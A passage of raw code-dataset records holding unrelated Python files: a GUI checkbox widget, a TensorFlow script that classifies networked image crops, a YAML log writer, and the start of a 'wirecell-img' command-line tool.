2018\r\n\r\n@author: m.vanturnhout\r\n'''\r\n\r\nimport logging\r\nimport time\r\nimport colors\r\nimport globals\r\n\r\nfrom Control import Control\r\nfrom Label import Label\r\nfrom Signal import Signal\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\nclass CheckBox(Control):\r\n '''\r\n classdocs\r\n '''\r\n check_color = (128, 128, 128)\r\n check_bgcolor = (244, 244, 244)\r\n check_padding = (4, 2)\r\n\r\n def __init__(self, text):\r\n '''\r\n Constructor\r\n '''\r\n Control.__init__(self)\r\n self.label = Label(text)\r\n self.add_child(self.label)\r\n self.checkmark = Label('X')\r\n self.checkmark.border_width = 1\r\n self.checkmark.font = globals.bold_font\r\n self.checkmark.text_color = CheckBox.check_color\r\n self.checkmark.bgcolor = CheckBox.check_bgcolor\r\n self.checkmark.padding = CheckBox.check_padding\r\n self.add_child(self.checkmark)\r\n self._checked = False\r\n self.on_checked = Signal()\r\n \r\n @property\r\n def font(self):\r\n return self.label.font\r\n \r\n @font.setter\r\n def font(self,font):\r\n self.label.font = font\r\n \r\n def layout(self):\r\n Control.layout(self)\r\n self.size_to_fit()\r\n\r\n def size_to_fit(self):\r\n self.checkmark.size_to_fit()\r\n self.label.size_to_fit()\r\n self._set_checkmark()\r\n self.label.frame.left = self.checkmark.frame.right\r\n self.frame.size = (self.checkmark.frame.width + self.label.frame.width,self.label.frame.height)\r\n self.checkmark.frame.size = (self.checkmark.frame.width,self.label.frame.height)\r\n\r\n @property\r\n def value(self):\r\n return self._checked\r\n\r\n @value.setter\r\n def value(self, yesno):\r\n #print '!!!!!!! SET VALUE '+str(yesno)\r\n if isinstance(yesno, bool):\r\n self._checked = yesno\r\n elif isinstance(yesno, (int, float)):\r\n self._checked = (yesno > 0)\r\n self.on_checked(self, yesno)\r\n self._set_checkmark()\r\n\r\n def _set_checkmark(self):\r\n if self._checked:\r\n self.checkmark.value = 'X'\r\n else:\r\n self.checkmark.value = ' '\r\n\r\n def toggle(self):\r\n self.value = not self.value\r\n self._set_checkmark()\r\n\r\n def mouse_up(self, button, pt):\r\n# print 'toggle'\r\n self.toggle()\r\n ","sub_path":"Application/gui/CheckBox.py","file_name":"CheckBox.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468375242","text":"# Imports\nimport numpy as np\nimport os\nimport argparse\nimport tensorflow as tf\nfrom cnn_models import CNN_Model\ncnn_model = CNN_Model #which model to use\nimport cv2\nfrom functions import receiverNetwork, draw_boxes, parse_predictions, get_labels, visualize, prune_boxes, crop_and_warp\nimport time\n\n#DEBUG, INFO, WARN, ERROR, or FATAL\ntf.logging.set_verbosity(tf.logging.WARN)\n\n#Argument parsing\nparser = argparse.ArgumentParser()\nparser.add_argument(\"model_name\", help=\"Relative path to model\")\nparser.add_argument(\"vis\", help=\"Visualizations? y/n\")\nargs = parser.parse_args()\nmodel_path = args.model_name\n\ndef main(unused_argv):\n\n # Create the Estimator\n classifier = tf.estimator.Estimator(\n model_fn=cnn_model,\n model_dir=model_path)\n\n labels = get_labels() #maps id to name\n receiver = receiverNetwork(9002) #receive from edgeboxes\n \n total_time = 0\n total_execs = 0\n \n try:\n #get image and boxes from network\n image, boxes = receiver.receiveBoxes()\n while True:\n b_time = time.time() #beginning time\n \n #Create list of all objects, cropped and warped\n objects = list()\n for box in boxes:\n object = crop_and_warp(image, box)\n objects.append(object)\n samples = np.array(objects, dtype=np.float32)\n \n #Input function with all objects in image\n pred_input_fn = tf.estimator.inputs.numpy_input_fn(\n x=samples,\n num_epochs=1,\n shuffle=False)\n\n predictions = classifier.predict(\n input_fn=pred_input_fn,\n yield_single_examples=False)\n \n classes, scores = parse_predictions(predictions)\n \n #Get rid of 0 objects and merge iou threshold\n boxes, classes, scores = prune_boxes(boxes, 0.7, classes, scores)\n\n exec_time = time.time()-b_time\n print(\"Executed in:\", exec_time) #execution time\n total_time = total_time + exec_time\n total_execs = total_execs + 1\n \n if args.vis == 'y':\n image = image*255 #Convert to value in [0,255] for vis\n image = image.astype(np.uint8)\n image = visualize(boxes, image, scores, classes, labels)\n \n cv2.imshow(\"Image\", image)\n cv2.waitKey(10)\n \n #get image and boxes from network\n image, boxes = receiver.receiveBoxes()\n \n except KeyboardInterrupt:\n exit(total_time/total_execs)\n \nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"predict_cnn.py","file_name":"predict_cnn.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"133509996","text":"import sys,os\nimport yaml\n\nclass YAMLLogWriter():\n \"\"\"\n Logger with a yaml file.\n\n How to use\n ----------\n root = \"log_dir/log.yaml\"\n for i in range(5):\n logger = LogWriter(root)\n log_dict = {\"log1\": i, \"log2\": -i}\n logger.update(log_dict)\n\n If you want to load LogWriter yaml file....\n root = \"log_dir/log.yaml\"\n new_root = \"log_dir/new_log.yaml\"\n logger = LogWriter(new_root, root)\n\n or\n\n logger = LogWriter(new_root)\n logger.load_log(root)\n \"\"\"\n def __init__(self, root:str, loading_log_root:str=None):\n\n self.root = root\n self.status = []\n\n if loading_log_root is not None:\n self.load_log(loading_log_root)\n\n def load_log(self, loading_log_root:str):\n with open(loading_log_root, mode=\"r\") as f:\n self.status = yaml.load(f, Loader=yaml.FullLoader)\n\n def update(self, log):\n self.status.append(log)\n with open(self.root, mode=\"w\") as f:\n yaml.dump(self.status, f, indent=2)\n","sub_path":"examples/previous_code/utils/log_writer.py","file_name":"log_writer.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300825471","text":"#!/usr/bin/env python\n'''\nThe wirecell-img main\n'''\nimport os\nimport sys\nimport json\nimport click\nimport pathlib\nfrom collections import Counter\nimport numpy\nimport matplotlib.pyplot as plt\nfrom wirecell import units\nfrom wirecell.util.functions import unitify, unitify_parse\nfrom wirecell.util import ario\nfrom wirecell.util.plottools import pages\nfrom scipy.spatial.transform import Rotation\nfrom zipfile import ZipFile\nfrom zipfile import ZIP_DEFLATED as ZIP_COMPRESSION\n### bzip2 is actually worse than deflate for depos!\n# from zipfile import ZIP_BZIP2 as ZIP_COMPRESSION\nfrom io import BytesIO\n\ncmddef = dict(context_settings = dict(help_option_names=['-h', '--help']))\n\n@click.group(\"img\", **cmddef)\n@click.pass_context\ndef cli(ctx):\n '''\n Wire Cell Toolkit Imaging Commands\n\n A cluster file is produced by ClusterFileSink and is an archive\n holding JSON or Numpy or as a special case may be a single JSON.\n\n '''\n pass\n\n\n# 1. wrapper to handle undrift and loading of depo and cluster files.\n# 2. retrofit all the commands.\n\nimport functools\n\ndef cluster_file(func):\n ''' A CLI decorator giving the command a \"clusters\" argument\n providing a generator of cluster graphs. '''\n\n @click.option(\"-B\", \"--undrift-blobs\", type=str, default=None,\n help=\"Undrift with ',